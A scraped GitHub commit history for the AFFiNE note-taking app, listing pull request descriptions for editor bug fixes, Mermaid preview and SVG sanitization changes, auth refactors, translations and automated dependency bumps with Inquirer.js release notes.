fix(editor): prevent backspace in icon picker search from deleting editor content (#15089)
## Problem
When the callout block's icon picker is open and the user types in the
search input, pressing backspace deletes content in the main editor
instead of the search text.
## Root Cause
The callout icon picker is mounted via `createPopup` inside
`editor-host`. `PageKeyboardManager` registers a global `Backspace`
handler on the editor host (`keyboard-manager.ts`) with `{ global: true
}`, which fires on every backspace keydown regardless of what element is
focused. Without `stopPropagation`, the backspace event from the search
input bubbles up through the DOM and triggers block deletion.
Other keys are unaffected because the editor handles character input
through `contenteditable` focus, those handlers only act when a
contenteditable node is active.
## Fix
Add `onKeyDown` with `e.stopPropagation()` to the search inputs in both
`EmojiPicker` and `AffineIconPicker`. This matches the existing pattern
already used by `MenuComponent` (`menu-renderer.ts:107`) and all other
interactive components (`date-picker`, `inline-edit`, `prompt-modal`).
## Why not affected elsewhere
`DocIconPicker` uses the same pickers but wraps them in a Radix UI
`Menu` with `modal: true`, which portals outside `editor-host` — so
backspace events never reach the editor's global handler there.
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Bug Fixes**
* Improved keyboard event handling in search inputs for icon and emoji
pickers
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
|
||
|
|
d10dd12663 |
fix(core): transport may not available (#15087)
fix #15086 #### PR Dependency Tree * **PR #15087** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Console logging is now disabled in production builds to reduce unnecessary log output, while remaining enabled in development for debugging purposes. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
edc87e38df |
chore: bump up RevenueCat/purchases-ios-spm version to from: "5.76.0" (#15077)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm) | minor | `from: "5.75.0"` → `from: "5.76.0"` | --- ### Release Notes <details> <summary>RevenueCat/purchases-ios-spm (RevenueCat/purchases-ios-spm)</summary> ### [`v5.76.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.75.0...5.76.0) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.75.0...5.76.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDkuNCIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
65c3271beb |
feat(server): clean up dirty data from legacy version (#15078)
#### PR Dependency Tree * **PR #15078** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Persist and replay incoming payment webhooks for reliability. * Track provider-level subscriptions, payment events, and per-target trial usage across providers. * Nightly replay job to reprocess stuck payment events. * Shadow backfill mode and emit-suppression options to control projection/backfill side effects. * Subscriptions now derived from entitlements + provider facts. * **Bug Fixes** * Improved error propagation, retry tracking, and safer owner-grant projection handling. * **Tests** * Added webhook failure/replay, provider integration, entitlement projection, and trial/checkout tests. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
37ffef76a4 |
fix(core): restore Mermaid preview labels and theme-aware contrast (#15073)
fix #14979 [Bug]: mermaid transparent text in light theme ## Summary Mermaid diagram preview in code blocks showed shapes and connectors but no node or edge labels, with poor contrast in dark mode. This change fixes rendering, sanitization, and display so labels are visible in both light and dark themes. ## Root cause 1. **Mermaid 11 config** — `flowchart.htmlLabels: false` is ignored; only root-level `htmlLabels` applies. Labels were still emitted in `<foreignObject>`. 2. **SVG sanitization** — `sanitizeSvg()` removed all `foreignObject` elements (and did not allow `<use>`), stripping most label content. 3. **Theme mismatch** — Preview always used Mermaid’s light `default` theme while the preview panel follows AFFiNE light/dark, causing dark text on dark backgrounds for edge and title text. 4. **Embedded CSS** — Mermaid’s inline SVG styles often do not apply after sanitization, leaving text without a visible `fill`. ## Changes ### Classic renderer (`classic-mermaid.ts`) - Set root-level `htmlLabels: false` (Mermaid 11+). - Map `dark` theme to Mermaid’s built-in `dark` palette. ### Sanitization (`bridge.ts`) - Allow `<use>` and `xlink:href` / `href` for label references. - Allow `class`, `style`, and `id` on SVG nodes. - **Sanitize** `foreignObject` inner HTML with DOMPurify instead of deleting it. ### Preview UI (`mermaid-preview.ts`) - Sync render theme with app `data-theme` (`default` / `dark`) and re-render on theme change. - Add CSS overrides so `text` / `tspan` and HTML inside `foreignObject` use AFFiNE `text/primary`. ### Native / mobile (`preview.rs`) - Map `dark` and `modern` themes to the modern renderer options (light uses `default`). ### Types & tests - Extend `MermaidRenderTheme` with `'dark'`. - Update unit tests for sanitization and classic config. - Add integration test (skips when the test environment cannot lay out Mermaid). ## Test plan - [ ] Hard refresh or restart `yarn dev`. - [ ] Create a `mermaid` code block: `graph TD; A-->B` → enable **Preview**. - [ ] Confirm labels **A** and **B** appear inside nodes and on the edge. - [ ] Toggle AFFiNE **light** / **dark** theme; confirm preview updates and text stays readable. - [ ] Run unit tests: ```bash yarn vitest run packages/frontend/core/src/modules/code-block-preview-renderer/ ``` - [ ] (Optional) With **Enable Native Mermaid Renderer** enabled in experimental settings, repeat the manual check. ## Notes for reviewers - Security: `foreignObject` content is sanitized with the HTML profile; scripts are stripped. - The integration test intentionally skips when Mermaid produces an empty diagram (e.g. happy-dom without full browser layout). <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Mermaid diagrams now adapt to the app's dark or light theme and update in real time. * **Improvements** * SVG sanitization now preserves diagram labels and foreignObject text while removing unsafe content. * Classic Mermaid rendering adjusted to keep text labels intact for previews. * **Tests** * Added unit and integration tests covering Mermaid rendering and SVG sanitization. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
81760fd45c | chore: cleanup legacy logic (#15072) | ||
|
|
aca47445aa |
feat(client): migration old package to rspack (#15068)
#### PR Dependency Tree * **PR #15068** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Upgraded Vitest across packages to 4.1.8 and bumped Tailwind PostCSS to 4.3.0 * CLI/tooling updated to support the media-capture-playground package and adjust build/dev server behavior * **Bug Fixes** * Improved workspace deletion reliability in the Electron app * **Refactor** * Simplified media capture playground build setup (build/config adjustments) * **Tests** * Made tests more robust by preserving/restoring environment state during runs <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
38110de134 |
fix(core): desktop e2e (#15062)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Sign-in flows now reliably propagate richer authentication results (user data and session type), improving persistence and reducing intermittent sign-in issues. * Native token handling gains a fallback for environments without encrypted storage, improving session reliability. * **New Features** * User-visible warning when sign-in is session-only because encrypted storage is unavailable. * **Chores** * Tooling ignore patterns updated to exclude .codex. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
7123595831 |
chore: bump deps (#15059)
#### PR Dependency Tree * **PR #15059** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Configurable minimum account age before new accounts can invite members or create share links (default: 24 hours). * Sign-in now returns and caches user info for improved session handling. * **Bug Fixes** * Queue handling accepts and resolves job IDs with special characters. * Improved clipboard/rich-text caret handling and nested-list paste reliability. * Calendar tests use dynamic current-month dates. * AI search returns explicit "No matching documents" when none found. * Auth session responses are explicitly non-cacheable. * **Chores** * Dependency and toolchain bumps; admin UI config/schema exposes the new account-age setting. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
78cf402141 |
fix: handle empty results in MCP keyword_search tool (#15058)
## Description Fixes: #15038 — MCP keyword_search tool errors with "Unexpected response type" when no results are found. ### Problem When the MCP `keyword_search` tool returns no matching documents, the access control `.docs()` method may return `undefined`/`null` for an empty input array. Calling `.map()` on this value throws an error, and the MCP framework wraps it as "Unexpected response type". ### Solution Added a guard check after the permission filtering step. If the result is empty or null, the tool now returns a proper informational response instead of throwing. ### Changes - `packages/backend/server/src/plugins/copilot/mcp/provider.ts`: Added null/empty check before `docs.map()` in the keyword_search tool execute function. ### Testing - **Before**: `keyword_search` with a non-existent keyword throws "Unexpected response type" - **After**: `keyword_search` with a non-existent keyword returns `{ content: [{ type: 'text', text: 'No matching documents found.' }] }` <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Prevented errors when document data is missing, improving search stability. * Improved search feedback by displaying a clear "No matching documents found." message instead of empty results. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
ebd3e62ed9 |
fix(server): canary may missing changelog (#15061)
fix #15027 #### PR Dependency Tree * **PR #15061** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Improved handling of missing release notes during upgrade checks. The changelog field now defaults to an empty value when release information is unavailable. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
ce9841df9d |
feat(server): passkey pre-refactor (#15060)
#### PR Dependency Tree * **PR #15060** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * OpenApp native sign-in and native session exchange (JWT) for mobile & desktop. * Centralized short-lived auth challenge store for one-time tokens. * Encrypted per-endpoint token storage and native token handlers (Android, iOS, Electron). * **Improvements** * Richer auth-method reporting (password, magic link, OAuth, passkey) and improved sign-in flows. * Hardened magic-link, OAuth, and session issuance; JWT-backed sessions and websocket JWT support. * UX tweaks: form-based password submit, OTP autocomplete, adjusted captcha flow. * **Bug Fixes** * Expanded tests and auth-state resets to avoid cross-test leakage. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
5b9d51b41b |
chore: bump up RevenueCat/purchases-ios-spm version to from: "5.75.0" (#15048)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm) | minor | `from: "5.74.0"` → `from: "5.75.0"` | --- ### Release Notes <details> <summary>RevenueCat/purchases-ios-spm (RevenueCat/purchases-ios-spm)</summary> ### [`v5.75.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.74.0...5.75.0) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.74.0...5.75.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDIuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIwMi4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
7a575a4a5b |
fix: hide experimental settings for doc and folder icons (#15021)
should fix #13955 The emoji doc and folder icons have been officially released with v0.25 but the experimental settings were still available with no effect if switched. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Feature flags for emoji folder and document icons are no longer user-configurable. <!-- review_stack_entry_start --> [](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15021?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack) <!-- review_stack_entry_end --> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
b05c387f96 |
fix(server): mail test & retry (#15044)
#### PR Dependency Tree * **PR #15044** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Stop sending notifications to disabled users; skip member invites when workspace names contain URLs/domains * Improve mail retry handling (per-recipient exhaustion, expiry, and cache cleanup) * Make many email headers/lead lines more generic and consistent * Fail-safe workspace content parsing to avoid crashes * **New Features** * 24-hour signup protection for sharing, invites, and invite-link creation * Job-queue: remove jobs by payload predicate * **Tests** * Expanded tests for mail jobs, SMTP hostname handling, payment checkout, job-queue removal, and abuse-detection utilities * Updated test fixtures to set createdAt timestamps for new users * **Chores** * Added required name input for test-email mutation * Database flush retry with deadlock detection/backoff <!-- review_stack_entry_start --> [](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15044?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack) <!-- review_stack_entry_end --> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
2bd920fea6 |
chore: bump up @inquirer/prompts version to v8 (#15025)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@inquirer/prompts](https://redirect.github.com/SBoudrias/Inquirer.js/blob/main/packages/prompts/README.md) ([source](https://redirect.github.com/SBoudrias/Inquirer.js)) | [`^7.10.1` → `^8.0.0`](https://renovatebot.com/diffs/npm/@inquirer%2fprompts/7.10.1/8.5.0) |  |  | --- ### Release Notes <details> <summary>SBoudrias/Inquirer.js (@​inquirer/prompts)</summary> ### [`v8.5.0`](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.3...5ca6d1101d5d3f8fb066cd5b389bccfdafbbe0c0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.3...@inquirer/prompts@8.5.0) ### [`v8.4.3`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.3) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.2...@inquirer/prompts@8.4.3) - Fix: Windows rendering bug - Fix: Preserve exact literal types in `choices` array (Typescript only) - Fix: Allow input `default` value to be of type `undefined` (Typescript only) - Bump dependencies ### [`v8.4.2`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.2) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.1...@inquirer/prompts@8.4.2) - Fix: some Windows terminals would freeze and not react to keypresses. ### [`v8.4.1`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.1) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.0...@inquirer/prompts@8.4.1) - Improve `expand` prompt type inferrence. ### [`v8.4.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.3.2...@inquirer/prompts@8.4.0) - Feat: Added a loading message while validating editor prompt input. - Type improvement: Better type inference with checkbox, search and expand prompts. - Fix: `editor` prompt not always properly handling editor path on windows. ### [`v8.3.2`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.3.2) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.3.1...@inquirer/prompts@8.3.2) - Fix broken 8.3.1 release process. ### [`v8.3.1`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.3.1) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.3.0...@inquirer/prompts@8.3.1) - Bump dependencies ### [`v8.3.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.3.0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.2.1...@inquirer/prompts@8.3.0) - Fix: Keypresses happening before a prompt is rendered are now ignored. - Fix (checkbox): Element who're both checked and disabled are now always included in the returned array. - Feat (select/checkbox): Cursor will now hover disabled options of the list; but they still cannot be interacted with. This prevents the cursor jumping ahead in ways that can be confusing. - Feat: various new theme options to make all prompts content localizable. Finally, see our new [`@inquirer/i18n` package](https://redirect.github.com/SBoudrias/Inquirer.js/tree/main/packages/i18n)! ### [`v8.2.1`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.2.1) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.2.0...@inquirer/prompts@8.2.1) - chore: Switch `wrap-ansi` with `fast-wrap-ansi` ### [`v8.2.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.2.0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.1.0...@inquirer/prompts@8.2.0) - feat(`search`): Add support for `default`. - feat(`rawlist`): Add support for `description` of choices. That information is displayed under the list when the choice is highlighted. - Bump dependencies ### [`v8.1.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.1.0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.2...@inquirer/prompts@8.1.0) - Feat: `rawlist` now supports `default` option. - Fix: `select` now infer return type properly when passing a `choices` array of string literals. ### [`v8.0.2`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.0.2) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.1...@inquirer/prompts@8.0.2) - Fix Typescript not discovering types when `moduleResolution` is set to `commonjs` (you probably want to fix that in your project if it's still in your tsconfig) ### [`v8.0.1`](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.0...@inquirer/prompts@8.0.1) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.0...@inquirer/prompts@8.0.1) ### [`v8.0.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.0.0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@7.10.1...@inquirer/prompts@8.0.0) ### Release Notes #### 🚨 Breaking Changes This is a major release that modernizes the codebase for Node.js ≥ 20. ##### ESM Only - No More CommonJS Support **Impact:** All packages are now ESM-only. CommonJS imports are no longer supported. If you're on modern Node versions (≥ 20), this should be transparent and have no impact. ##### Node.js Version Requirement **Minimum Node.js version is now 20.x** Node.js versions below 20 are no longer supported. Please upgrade to Node.js 20 or later. Node min versions: `>=23.5.0 || ^22.13.0 || ^21.7.0 || ^20.12.0` ##### Deprecated APIs Removed The following deprecated APIs have been removed after being deprecated in previous releases: ##### `list` prompt alias removed (affects `inquirer` package only) The `list` alias has been removed from the `inquirer` package. This only impacts users of the legacy `inquirer` package, not users of `@inquirer/prompts` or individual prompt packages. ```js // ❌ No longer available (inquirer package only) import inquirer from 'inquirer'; const answer = await inquirer.prompt([ { type: 'list', name: 'choice', message: 'Pick one:', choices: ['a', 'b'] } ]); // ✅ Use 'select' instead import inquirer from 'inquirer'; const answer = await inquirer.prompt([ { type: 'select', name: 'choice', message: 'Pick one:', choices: ['a', 'b'] } ]); ``` ##### `helpMode` theme property removed ```js // ❌ No longer available const answer = await select({ theme: { helpMode: 'never' } }); // ✅ Use theme.style.keysHelpTip instead const answer = await select({ theme: { style: { keysHelpTip: () => undefined // or your custom styling function } } }); ``` This affects the following prompts: - `@inquirer/checkbox` - `@inquirer/search` - `@inquirer/select` ##### `instructions` config property removed ```js // ❌ No longer available const answer = await checkbox({ instructions: 'Custom instructions' }); // ✅ Use theme.style.keysHelpTip instead const answer = await checkbox({ theme: { style: { keysHelpTip: (text) => 'Custom instructions' } } }); ``` This affects the following prompts: - `@inquirer/checkbox` - `@inquirer/search` - `@inquirer/select` ##### `cancel()` method removed The `cancel()` method on prompt return custom `Promise` has been removed. ```js // ❌ No longer available const answerPromise = input({ message: 'Name?' }); answerPromise.cancel(); const answer = await answerPromise; // ✅ Use AbortSignal instead const controller = new AbortController(); const answer = await input( { message: 'Name?' }, { signal: controller.signal } ); controller.abort(); ``` ##### Color Library Change: yoctocolors → Node.js `styleText` **Internal change:** The project now uses Node.js built-in `util.styleText()` instead of the `yoctocolors` package for terminal colors. This makes Inquirer smaller and reduces risks of vulnerabilities coming from transitive dependencies. </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
b3b9c54a89 |
chore: bump up @types/nodemailer version to v8 (#15026)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@types/nodemailer](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/nodemailer) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/nodemailer)) | [`^7.0.0` → `^8.0.0`](https://renovatebot.com/diffs/npm/@types%2fnodemailer/7.0.9/8.0.0) |  |  | --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
1d08e1d8c0 |
fix(server): dirty data handle (#15034)
#### PR Dependency Tree * **PR #15034** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Refactor** * Consolidated subscription visibility and “active” selection logic so all subscription queries use a shared, consistent filter across the platform. * **Tests** * Added a test to ensure expired subscriptions are excluded from active subscription results. * Updated test fixtures to differentiate expired, unexpired, and onetime subscriptions for more accurate coverage. <!-- review_stack_entry_start --> [](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15034?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack) <!-- review_stack_entry_end --> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
66a6a5fffc |
feat(i18n): add missing zh-Hans translations (#15032)
## Summary This PR completes the missing Simplified Chinese (`zh-Hans`) i18n resource coverage. The current i18n completeness calculation is based on key coverage between `en.json` and each locale resource file. Before this change, `zh-Hans.json` contained 2331 keys while `en.json` contained 2406 keys, resulting in a displayed completeness of 97%. This change adds the 75 missing `zh-Hans` translation entries and updates the generated completeness value for `zh-Hans` from 97% to 100%. ## Changes - Added 75 missing Simplified Chinese translations to `packages/frontend/i18n/src/resources/zh-Hans.json`. - Updated `packages/frontend/i18n/src/i18n-completenesses.json` so `zh-Hans` now reports 100% completeness. - Kept the scope limited to missing i18n resource keys only. ## Notes This PR does not modify existing `zh-Hans` translations, terminology choices, or hardcoded English UI strings outside the i18n resource files. ## Verification - Confirmed `zh-Hans.json` parses successfully. - Confirmed `zh-Hans.json` now has full key coverage against `en.json`. - Confirmed missing key count is 0. - Confirmed computed `zh-Hans` completeness is 100%. - Ran pre-commit checks: - `yarn lint-staged` - `yarn lint:ox` <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Completed Chinese (Simplified) translations with 100% coverage for the application. * Added new translations across multiple areas: appearance and image settings, export functionality, document import from Bear and Obsidian, analytics and viewer information, editor settings including auto-date titles and icon options, workspace sharing controls, calendar integration with CalDAV support, share menu tooltips, and comprehensive error messages. <!-- review_stack_entry_start --> [](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15032?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack) <!-- review_stack_entry_end --> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
4f14e8840c |
chore: bump up RevenueCat/purchases-ios-spm version to from: "5.74.0" (#15024)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm) | minor | `from: "5.73.0"` → `from: "5.74.0"` | --- ### Release Notes <details> <summary>RevenueCat/purchases-ios-spm (RevenueCat/purchases-ios-spm)</summary> ### [`v5.74.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.73.1...5.74.0) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.73.1...5.74.0) ### [`v5.73.1`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5731) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.73.0...5.73.1) #### 5.73.1 </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
6d1172ba44 | chore: bump deps | ||
|
|
2aa56cbccd | chore: bump toolchain & fix lint | ||
|
|
eecd0a2169 |
feat(i18n): add Turkish translation (#15000)
This pull request introduces support for the Turkish language to the frontend internationalization system and adds a new pull request template to standardize PR descriptions. The main changes are grouped below: **Internationalization: Turkish Language Support** * Added `'tr'` (Turkish) to the `Language` type and `SUPPORTED_LANGUAGES` object in `index.ts`, including its display name, native name, flag emoji, and resource loader. [[1]](diffhunk://#diff-ba5f665c3490d0f5acb2cb70f08314c5373137fa8085ab05175047f10cb7fdf8L26-R27) [[2]](diffhunk://#diff-ba5f665c3490d0f5acb2cb70f08314c5373137fa8085ab05175047f10cb7fdf8R183-R188) * Updated `i18n-completenesses.json` to include Turkish (`"tr": 6`). <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Turkish language can now be selected in the app. * **Localization** * Initial Turkish translations added and translation completeness set to 100%. * Locale metadata added (display name, original name, flag) for Turkish. <!-- review_stack_entry_start --> [](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15000?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack) <!-- review_stack_entry_end --> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
f2980503b4 |
fix(editor): sorting of page emoji display toggle (#15020)
